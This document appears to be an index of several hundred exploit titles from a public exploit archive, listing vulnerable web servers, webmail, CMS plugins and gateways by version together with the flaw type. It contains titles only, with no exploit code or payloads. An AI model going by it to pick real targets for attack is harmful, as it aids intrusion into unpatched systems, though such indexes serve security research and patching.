[23312] BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation Vulnerability
[23310] TelCondex SimpleWebserver 2.12.30210 build 3285 HTTP Referer Remote Buffer Overflow Vulnerability
[23291] Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability
[23271] PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability
[23222] File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure Vulnerability
[23209] mutant penguin mpweb pro 1.1.2 - Directory Traversal vulnerability
[23196] WebFS 1.x Long Pathname Buffer Overrun Vulnerability
[23191] Savant Web Server 3.1 Page Redirect Denial of Service Vulnerability
[23166] Plug And Play Web Server 1.0 002c FTP Service Command Handler Buffer Overflow Vulnerabilities
[23157] Plug and Play Web Server 1.0 002c Directory Traversal Vulnerability
[23152] Yahoo! Webcam ActiveX Control 2.0 .0.107 Buffer Overrun Vulnerability
[23136] futurewave webx server 1.1 - Directory Traversal vulnerability
[23120] ICQ 2003 Webfront guestbook Cross-Site Scripting Vulnerability
[23107] Opera Web Browser 12.11 Crash PoC
[23102] FoxWeb 2.5 PATH_INFO Remote Buffer Overrun Vulnerability
[23099] WebCalendar 0.9.x Multiple Module SQL Injection Vulnerabilities
[23098] WebCalendar 0.9.x week.php user XSS
[23097] WebCalendar 0.9.x colors.php color XSS
[23087] Check Point Firewall-1 4.x SecuRemote Internal Interface Address Information Leakage Vulnerability
[23065] AldWeb MiniPortail 1.9/2.x LNG Parameter Cross-Site Scripting Vulnerability
[23037] DWebPro 3.4.1 Http.ini Plaintext Password Storage Vulnerability
[23017] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 search Module PDA_limit Parameter XSS
[23016] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS
[23015] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module fatcat_id Parameter XSS
[23014] phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS
[23013] PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection Vulnerabilities
[22998] PostNuke 0.6/0.7 web_links Module TTitle Cross-site Scripting Vulnerability
[22958] e107 Website System 0.554 HTML Injection Vulnerability
[22956] e107 Website System 0.555 DB.PHP Information Disclosure Vulnerability
[22949] Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow Vulnerability
[22948] MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability
[22947] 3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS
[22945] Savant Webserver 3.1 - Denial of Service Vulnerabilities
[22944] Savant Web Server 3.1 CGITest.HTML Cross Site Scripting Vulnerability
[22942] WebCalendar 0.9.x Local File Include Information Disclosure Vulnerability
[22935] Websense Proxy Filter Bypass
[22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
[22897] Twilight WebServer 1.3.3 .0 GET Request Buffer Overflow Vulnerability
[22874] CPanel 5.0/5.3/6.x Admin Interface HTML Injection Vulnerability
[22869] Microsoft Outlook 5.5/2000 Web Access HTML Attachment Script Execution Vulnerability
[22838] BRS WebWeaver 1.0 Error Page Cross-Site Scripting Vulnerability
[22834] Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (2)
[22833] Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1)
[22829] webid <= 1.0.5 - Directory Traversal
[22828] WeBid <= 1.0.5 - Cross Site Scripting Vulnerabilities
[22827] Compaq Web-Based Management Agent Remote File Verification Vulnerability
[22826] VisNetic WebMail 5.8.6 .6 Information Disclosure Vulnerability
[22825] Armida Databased Web Server 1.0 - Remote GET Request Denial of Service Vulnerability
[22823] Compaq Web-Based Management Agent Access Violation Denial of Service Vulnerability
[22822] Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability
[22812] WebJeff Filemanager 1.6 File Disclosure Vulnerability
[22807] SurfControl Web Filter 4.2 .0.1 File Disclosure Vulnerability
[22804] Kerio MailServer 5.6.3 Web Mail DO_MAP Module Cross-Site Scripting Vulnerability
[22799] Kerio MailServer 5.6.3 Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability
[22795] MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal Vulnerability
[22769] Methodus 3 Web Server File Disclosure Vulnerability
[22759] WebBBS Pro 1.18 - GET Request Denial of Service Vulnerability
[22758] silentthought simple web server 1.0 - Directory Traversal vulnerability
[22755] Aiglon Web Server 2.0 Installation Path Information Disclosure Weakness
[22747] MaxWebPortal 1.30 Remote Database Disclosure
[22746] MaxWebPortal 1.30 search.asp Search Parameter XSS
[22744] Synkron.Web 3.0 HTML Injection Vulnerability
[22731] Mailtraq 2.2 Webmail Utility Path Disclosure Vulnerability
[22718] Pi3Web 2.0.2 SortName Buffer Overflow Vulnerability
[22716] WebChat 2.0 Users.PHP Cross-Site Scripting Vulnerability
[22715] WebChat 2.0 Users.PHP Database Username Disclosure Weakness
[22705] Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability
[22704] Webchat 2.0 Module Path Disclosure Weakness
[22702] Webfroot Shoutbox 2.32 Expanded.PHP Remote Command Execution Vulnerability
[22698] WebCortex WebStores2000 SQL Injection Vulnerability
[22687] Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability
[22671] Webfroot Shoutbox 2.32 URI Parameter File Disclosure Vulnerability
[22670] Microsoft IIS 5 WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability
[22650] BRS WebWeaver 1.0 4 POST and HEAD Denial of Service Vulnerability
[22610] Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow Vulnerability
[22609] Snowblind 1.0/1.1 Web Server File Disclosure Vulnerability
[22608] Snowblind Web Server 1.0/1.1 Malformed HTTP Request Denial of Service Vulnerability
[22598] PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure Vulnerability
[22589] PHPNuke 5.x/6.x Web_Links Module Remote SQL Injection Vulnerability
[22587] Pi3Web 2.0.1 Malformed GET Request Denial of Service Vulnerability
[22556] MDG Web Server 4D 3.6 HTTP Command Buffer Overflow Vulnerability
[22549] AVerCaster Pro RS3400 Web Server Directory Traversal
[22542] Alt-N WebAdmin 2.0.x Remote File Disclosure Vulnerability
[22541] Alt-N WebAdmin 2.0.x Remote File Viewing Vulnerability
[22527] Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow Vulnerability
[22522] Web Protector 2.0 Trivial Encryption Weakness
[22516] Xeneo Web Server 2.2.9 - Denial of Service Vulnerability
[22513] MPCSoftWeb 1.0 Database Disclosure Vulnerability
[22507] Web Wiz Forum 6.34 Information Disclosure Vulnerability
[22503] TW-WebServer 1.0 - Denial of Service Vulnerability (2)
[22502] TW-WebServer 1.0 - Denial of Service Vulnerability (1)
[22487] Web Wiz Site News 3.6 Information Disclosure Vulnerability
[22460] Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability
[22456] AutomatedShops WebC 2.0/5.0 Symbolic Link Following Configuration File Weakness
[22454] AutomatedShops WebC 2.0/5.0 Script Name Remote Buffer Overrun Vulnerability
[22448] BEA WebLogic 7.0 Hostname/NetBIOS Name Remote Information Disclosure Vulnerability
[22443] Beanwebb Guestbook 1.0 Unauthorized Administrative Access Vulnerability
[22421] Web Chat Manager 2.0 HTML Code Injection Vulnerability
[22378] MyAbraCadaWeb 1.0 Path Disclosure Vulnerability
[22364] Outblaze Webmail 0 Cookie Authentication Bypass Vulnerability
[22360] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (3)
[22359] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (2)
[22358] Sun JDK/SDK 1.3/1.4,IBM JDK 1.3.1,BEA Systems WebLogic 5/6/7 java.util.zip Null Value Denial of Service (1)
[22328] Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability
[22318] Webchat 0.77 Defines.PHP Remote File Include Vulnerability
[22300] Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability
[22275] Webmin 0.9x,Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability
[22265] cPanel 5.0 Openwebmail Local Privileges Escalation Vulnerability
[22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
[22143] BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness
[22129] H-Sphere Webshell 2.4 remote root exploit
[22128] H-Sphere Webshell 2.4 - Local Root Exploit
[22116] N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI
[22115] N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI
[22104] Captaris Infinite WebMail 3.61.5 HTML Injection Vulnerability
[22090] PHP-Nuke 6.0 Web Mail Script Injection Vulnerability
[22089] PHP-Nuke 6.0 Web Mail Remote PHP Script Execution Vulnerability
[22083] Deerfield VisNetic WebSite 3.5.13 .1 Cross Site Scripting Vulnerability
[22072] Cobalt RaQ4 Administrative Interface Command Execution Vulnerability
[22044] Web Server Creator Web Portal 0.1 - Remote File Include Vulnerability
[22041] Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities
[22018] keyfocus kf web server 1.0.8 - Directory Traversal vulnerability
[22001] Simple Web Server 0.5.1 File Disclosure Vulnerability
[21982] Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service Vulnerability
[21949] IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service Vulnerability
[21948] IBM Websphere Edge Server 3.69/4.0 HTTP Header Injection Vulnerability
[21947] IBM Websphere Edge Server 3.6/4.0 Cross Site Scripting Vulnerability
[21945] PlanetDNS PlanetWeb 1.14 Malformed Request Remote Buffer Overflow Vulnerability
[21938] TelCondex SimpleWebServer 2.0.6 - Denial of Service Vulnerability
[21935] My Web Server 1.0.1/1.0.2 Long Get Request Denial of Service Vulnerability
[21911] Oracle 9i Application Server 9.0.2 Web Cache Administration Tool Denial of Service Vulnerability
[21899] PHPWebSite 0.8.3 Article.PHP Cross-Site Scripting Vulnerability
[21898] SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability
[21897] SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability
[21877] EmuMail 5.0 Web Root Path Disclosure Vulnerability
[21864] PHPWebSite 0.8.3 News Message HTML Injection Vulnerability
[21858] ACWeb 1.14/1.8 Cross-Site Scripting Vulnerability
[21851] Webmin /file/show.cgi Remote Command Execution
[21837] InduSoft Web Studio Arbitrary Upload Remote Code Execution
[21825] phpWebsite 0.8.2 PHP File Include Vulnerability
[21809] Web Help Desk by SolarWinds - Stored XSS
[21801] DB4Web 3.4/3.6 Connection Proxy Vulnerability
[21800] DB4Web 3.4/3.6 File Disclosure Vulnerability
[21795] PlanetWeb 1.14 Long GET Request Buffer Overflow Vulnerability
[21794] Savant Webserver 3.1 File Disclosure Vulnerability
[21792] Savant Webserver 3.1 Malformed Content-Length Denial of Service Vulnerability
[21775] SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service Vulnerability
[21766] FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection Vulnerabilities
[21765] Webmin 0.x RPC Function Privilege Escalation Vulnerability
[21735] Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability
[21728] Kerio MailServer 5.0/5.1 Web Mail Multiple Cross Site Scripting Vulnerabilities
[21710] MyWebServer 1.0.2 Long HTTP Request HTML Injection Vulnerability
[21709] MyWebServer 1.0.2 Search Request Remote Buffer Overflow Vulnerability
[21707] GoAhead WebServer 2.1 - Remote Arbitrary Command Execution Vulnerability
[21698] BlueFace Falcon Web Server 2.0 Error Message Cross-Site Scripting Vulnerability
[21692] MS IE 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain
[21678] Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String Vulnerability
[21673] IPSwitch IMail 6.x/7.0.x Web Calendaring Incomplete Post Denial of Service Vulnerability
[21654] IPSwitch IMail 6.x/7.0/7.1 Web Messaging HTTP Get Buffer Overflow Vulnerability
[21630] Working Resources 1.7.x BadBlue Administrative Interface Arbitrary File Access
[21617] IMHO Webmail 0.9x Account Hijacking Vulnerability
[21608] GoAhead WebServer 2.1.x Error Page Cross Site Scripting Vulnerability
[21607] GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability
[21603] iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability
[21597] Key Focus KF Web Server 1.0.2 Directory Contents Disclosure Vulnerability
[21570] BasiliX Webmail 1.1 Message Content Script Injection Vulnerability
[21567] WebScripts WebBBS 4.x/5.0 - Remote Command Execution Vulnerability
[21562] Wolfram Research webMathematica 4.0 File Disclosure Vulnerability
[21542] AnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability
[21515] MS IE 5/6 FTP Web View Cross Site Scripting Vulnerability
[21498] Evolvable Shambala Server 4.5 Web Server Denial of Service Vulnerability
[21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
[21488] Netscape Enterprise Web Server for Netware 4/5 5.0 Information Disclosure
[21475] LocalWEB2000 2.1.0 Standard - File Disclosure Vulnerability
[21454] Clicky Web Pseudo-frames 1.0 - Remote File Include Vulnerability
[21449] NOCC 0.9.x Webmail Script Injection Vulnerability
[21435] askSam 4.0 Web Publisher Cross Site Scripting Vulnerability
[21432] BEA Systems WebLogic Server and Express 7.0 Null Character DoS
[21387] WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow
[21374] IBM Informix Web Datablade 4.1x Page Request SQL Injection Vulnerability
[21367] Abyss Web Server 1.0 File Disclosure Vulnerability
[21349] PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability
[21348] Webmin 0.x Script Code Input Validation Vulnerability
[21330] Netsweeper WebAdmin Portal Multiple Vulnerabilities
[21327] webERP <= 4.08.4 - WorkOrderEntry.php SQL Injection Vulnerability
[21306] Galacticomm Worldgroup 3.20 Remote Web Server Denial of Service Vulnerability
[21298] Essentia Web Server 2.1 Long URL Buffer Overflow Vulnerability
[21294] Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability
[21293] Phusion Webserver 1.0 Long URL Denial of Service Vulnerability
[21292] phusion webserver 1.0 - Directory Traversal vulnerability (2)
[21291] phusion webserver 1.0 - Directory Traversal vulnerability (1)
[21271] Webify Photo Gallery Arbitrary File Deletion Vulnerability
[21270] Webify Business Directory Arbitrary File Deletion Vulnerability
[21269] Webify eDownloads Cart Arbitrary File Deletion Vulnerability
[21250] Webify Blog Arbitrary File Deletion Vulnerability
[21239] Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability
[21237] Cyberstop Web Server 0.1 Long Request DoS Vulnerability
[21225] John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability
[21212] Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage Vulnerability
[21202] Anti-Web HTTPD 2.2 Script Engine File Opening Denial of Service Vulnerability
[21183] webmin 0.91 - Directory Traversal vulnerability
[21160] ibm informix web datablade 3.x/4.1 - Directory Traversal vulnerability
[21127] Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing Vulnerability
[21125] Mountain Network Systems WebCart 8.4 Command Execution Vulnerability
[21121] Oracle9iAS Web Cache 2.0 - Buffer Overflow Vulnerability
[21078] Respondus for WebCT 1.1.2 Weak Password Encryption Vulnerability
[21068] SIX-webboard 2.01 File Retrieval Vulnerability
[21017] Squid Web Proxy 2.3 Reverse Proxy Vulnerability
[20996] Basilix Webmail 1.0 File Disclosure Vulnerability
[20995] cobalt qube webmail 1.0 - Directory Traversal vulnerability
[20987] Citrix Nfuse 1.51 Webroot Disclosure Vulnerability
[20940] Tarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability
[20918] Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability
[20916] cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability
[20914] cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability
[20896] OReilly Software WebBoard 4.10.30 Pager Hostile JavaScript Vulnerability
[20895] WebTrends Enterprise Reporting Server 3.1 c/3.5 Source Code Disclosure
[20876] Simple Web Server 2.2-rc2 ASLR Bypass Exploit
[20857] web@all CMS 2.0 - Multiple Vulnerabilities
[20855] Wiki Web Help 0.3.9 - Multiple Stored XSS Vulnerabilities
[20854] IIS 5.0 WebDav Lock Method Memory Leak DoS Vulnerability
[20853] iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (2)
[20852] iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (1)
[20844] Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability
[20819] BRS WebWeaver 0.x FTP Root Path Disclosure Vulnerability
[20809] Excite for Web Servers 1.1 Administrative Password Vulnerability
[20807] datawizard webxq 2.1.204 - Directory Traversal vulnerability
[20806] Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability
[20801] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3)
[20800] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2)
[20799] PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1)
[20797] Perl Web Server 0.x Path Traversal Vulnerability
[20793] RobTex Viking Server 1.0.7 Relative Path Webroot Escaping Vulnerability
[20780] CrossWind CyberScheduler 2.1 websyncd remote Buffer Overflow Vulnerability
[20770] GoAhead Software GoAhead Webserver (Windows) 2.1 - Denial of Service
[20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability
[20762] webpa <= 1.1.0.1 - Multiple Vulnerabilities
[20753] IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability
[20719] Tomcat 3.2.1/4.0,Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability
[20707] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
[20706] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)
[20687] OReilly Software WebSite Professional 2.5.4 Directory Disclosure Vulnerability
[20685] IBM Net.Commerce 3.1/3.2 WebSphere Weak Password Vulnerability
[20682] Michael Lamont Savant Web Server 3.0 DoS Vulnerability
[20681] Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability
[20675] uebimiau webmail 2.7.2 - Stored XSS
[20672] Hivemail Webmail Multiple Stored XSS Vulnerabilities
[20669] GWebmail 0.7.3 XSS & LFI RCE Vulnerabilities
[20668] hupa webmail 0.0.2 - Stored XSS
[20665] T-dah Webmail CSRF & Stored XSS
[20664] Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability
[20655] Orange Software Orange Web Server 2.1 DoS Vulnerability
[20654] APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS
[20650] Sapio WebReflex 1.55 GET Denial of Service Vulnerability
[20638] Bajie Webserver 0.78/0.90 Remote Command Execution Vulnerability
[20637] itafrica webactive 1.0 - Directory Traversal vulnerability
[20634] John Roy Pi3Web 1.0.1 - Buffer Overflow Vulnerability
[20632] PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution
[20631] PALS Library System WebPALS 1.0 pals-cgi Traversal Arbitrary File Read
[20627] IlohaMail Webmail Stored XSS
[20625] SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability
[20609] Heat-On HSWeb Web Server 2.0 Path Disclosure Vulnerability
[20607] goahead webserver 2.0/2.1 - Directory Traversal vulnerability
[20601] iweb hyperseek 2000 - Directory Traversal vulnerability
[20585] localweb2000 1.1 - Directory Traversal vulnerability
[20580] webid <= 1.0.4 - Multiple Vulnerabilities
[20579] T-dah Webmail Multiple Stored XSS
[20578] hastymail2 webmail 1.1 rc2 - Stored XSS
[20558] Apache 1.2 Web Server DoS Vulnerability
[20549] Roundcube Webmail 0.8.0 - Stored XSS
[20538] Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability
[20534] WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability
[20531] IBM HTTP Server 1.3 AfpaCache/WebSphereNet.Data DoS Vulnerability
[20527] Informix Webdriver 1.0 - Remote Administration Access Vulnerability
[20516] BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow
[20484] OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability
[20483] WEBgais 1.0 websendmail Remote Command Execution Vulnerability
[20482] Novell Netware Web Server 3.x files.pl Vulnerability
[20478] IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control
[20477] IBM WebSphere MQ File Transfer Edition Web Gateway CSRF Vulnerability
[20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
[20465] Squid Web Proxy 2.2 cachemgr.cgi Unauthorized Connection Vulnerability
[20463] WEBgais 1.0 - Remote Command Execution Vulnerability
[20450] Trlinux Postaci Webmail 1.1.3 Password Disclosure Vulnerability
[20449] GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command Vulnerability
[20448] Novell NetWare Web Server 2.x convert.bas Vulnerability
[20447] WebCom datakommunikation Guestbook 0.1 rguest.exe Arbitrary File Access
[20446] WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access
[20445] IIS 1.0,Netscape Server 1.0/1.12,OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution
[20432] Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability
[20379] Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 Developer Remote Overflow
[20375] Sun Java Web Server 1.1 Beta Viewable .jhtml Source Vulnerability
[20370] Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability
[20366] winwebmail server 3.8.1.6 - Stored XSS
[20364] t-dah webmail client 3.2.0-2.3 - Stored XSS
[20346] Inout Mobile Webmail APP Persistent XSS Vulnerability
[20280] bytes interactive web shopper 1.0/2.0 - Directory Traversal vulnerability
[20279] extropia webstore 1.0/2.0 - Directory Traversal vulnerability
[20274] IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password Vulnerability
[20246] TalentSoft Web+ Application Server (Linux) 4.6 Example Script File Disclosure
[20245] TalentSoft Web+ Client/Monitor/server 4.6 Source Code Disclosure Vulnerability
[20244] TalentSoft Web+ Client/Monitor/server 4.6 Internal IP Address Disclosure
[20229] IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability
[20224] CamShot WebCam 2.6 Trial - Remote Buffer Overflow
[20219] WebTV for Windows 98/ME DoS Vulnerability
[20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
[20173] WebPageTest Arbitrary PHP File Upload
[20144] Sun AnswerBook2 1.4.2/1.4.3/1.4.4 Administration Interface Access
[20125] Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution
[20124] Dr. Web Control Center 6.00.3.201111300 XSS Vulnerability
[20123] Symantec Web Gateway 5.0.3.18 (deptUploads_data.php groupid parameter) Blind SQLi
[20113] Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection
[20104] Roxen WebServer 2.0 .X %00 Request File/Directory Disclosure Vulnerability
[20097] IBM Websphere Application Server 2.0./3.0/3.0.2 .1 Showcode Vulnerability
[20095] Sun Java Web Server 1.1.3/2.0 Servlets Vulnerability
[20088] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit
[20086] OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 'webfind.exe' Buffer Overflow
[20073] CVSWeb Developer CVSWeb 1.80 insecure perl "open" Vulnerability
[20066] Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow Vulnerability
[20064] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit
[20054] West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow
[20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
[20038] Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
[20037] Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure
[20028] Simple Web Server Connection Header Buffer Overflow
[20027] BEA Systems WebLogic Express 3.1.8/4/5 Source Code Disclosure
[19995] Michael Lamont Savant WebServer 2.1 CGI Source Code Disclosure
[19986] Oxide Webserver 2.0.4 - Denial of Service Vulnerability
[19976] Concatus IMate Web Mail Server 2.5 - Buffer Overflow Vulnerability
[19951] QuickCommerce 2.5/3.0,Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability
[19949] Gauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x Remote Buffer Overflow
[19937] Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit
[19893] L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability
[19877] FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure
[19842] TalentSoft Web+ 4.x Directory Traversal Vulnerability
[19810] Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow
[19809] Oracle Web Listener 4.0 .x for NT Batch File Vulnerability
[19790] webpagetest <= 2.6 - Multiple Vulnerabilities
[19753] ms frontpage personal webserver 1.0/personal web server 4.0 - Directory Traversal
[19747] Zeus Web Server 3.x Null Terminated Strings Vulnerability
[19730] A-V Tronics InetServ 3.0 WebMail Long GET Request Vulnerability
[19714] Netsweeper WebAdmin Portal Multiple Vulnerabilities
[19702] BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow
[19695] Michael Lamont Savant WebServer 2.0 NULL Character DoS Vulnerability
[19691] Tony Greenwood WebWho+ 1.1 - Remote Command Execution Vulnerability
[19682] Netscape Enterprise Server ,Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities
[19639] Alt-N MDaemon 2.8.5 0 WebConfig Overflow DoS Vulnerability
[19632] Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability
[19629] Webmatic 3.1.1 - Blind SQL Injection
[19623] International TeleCommunications WebBBS 2.13 login & password Buffer Overflow
[19574] Webify Link Directory SQL Injection
[19567] National Science Foundation Squid Web Proxy 1.0/1.1/2.1 Authentication Failure
[19540] t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal vulnerability
[19446] WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS Vulnerability
[19445] Microsoft FrontPage Personal WebServer 1.0 PWS DoS Vulnerability
[19431] webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability
[19406] symantec web gateway 5.0.2.8 - Multiple Vulnerabilities
[19400] WordPress Website FAQ Plugin 1.0 - SQL Injection
[19380] Ipswitch IMail 5.0/6.0 Web Service Buffer Overflow DoS Vulnerability
[19299] SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerability
[19293] Sysax <= 5.62 Admin Interface Local Buffer Overflow
[19292] iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities
[19225] Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability
[19224] Computalynx CMail 2.3 Web File Access Vulnerability
[19223] Floosietek FTGate 2.1 Web File Access Vulnerability
[19222] Gordano NTMail 4.2 Web File Access Vulnerability
[19221] SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability
[19212] Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities
[19178] webo site speedup <= 1.6.1 - Multiple Vulnerabilities
[19152] Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability
[19147] NT IIS4 Remote Web-Based Administration Vulnerability
[19135] Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities
[19134] Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities
[19133] Cells Blog CMS 1.1 - Multiple Web Vulnerabilities
[19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability
[19076] Apple Personal Web Sharing 1.1 Vulnerability
[19065] Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
[19038] Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability
[19031] Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability
[19011] Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability
[18955] Simple Web Content Management System 1.1-1.3 - Multiple SQL Injection
[18942] Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability
[18934] WeBid converter.php Remote PHP Code Injection
[18932] Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit
[18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
[18857] Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure
[18840] Fortinet FortiWeb Web Application Firewall Policy Bypass
[18832] Symantec Web Gateway Cross Site Scripting
[18824] Websense Triton Multiple Vulnerabilities
[18806] Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS
[18802] C4B XPhone UC Web 4.1.890S R1 XSS Vulnerability
[18797] WebCalendar 1.2.4 Pre-Auth Remote Code Injection
[18787] Wordpress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities
[18775] WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution
[18763] Liferay 6.0.x Webdav File Reading Vulnerability
